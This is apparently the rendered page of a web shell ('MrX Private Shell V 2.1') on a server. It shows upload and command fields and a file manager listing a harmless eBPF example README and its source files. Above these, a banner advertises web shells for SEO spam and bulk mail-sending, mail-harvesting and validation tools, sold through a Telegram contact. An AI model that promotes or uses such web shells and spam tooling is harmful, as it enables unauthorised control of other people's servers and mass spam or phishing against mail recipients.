__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
eBPF toy code examples (running in kernel) to familiarize yourself
with syntax and features:

- BTF defined map examples
 - bpf_graft.c		-> Demo on altering runtime behaviour
 - bpf_shared.c 	-> Ingress/egress map sharing example
 - bpf_map_in_map.c	-> Using map in map example

- legacy struct bpf_elf_map defined map examples
 - legacy/bpf_shared.c		-> Ingress/egress map sharing example
 - legacy/bpf_tailcall.c	-> Using tail call chains
 - legacy/bpf_cyclic.c		-> Simple cycle as tail calls
 - legacy/bpf_graft.c		-> Demo on altering runtime behaviour
 - legacy/bpf_map_in_map.c	-> Using map in map example

Note: Users should use new BTF way to defined the maps, the examples
in legacy folder which is using struct bpf_elf_map defined maps is not
recommended.

Filemanager

Name Type Size Permission Actions
legacy Folder 0755
README File 765 B 0644
bpf_graft.c File 1.85 KB 0644
bpf_map_in_map.c File 1.09 KB 0644
bpf_shared.c File 1.4 KB 0644
Filemanager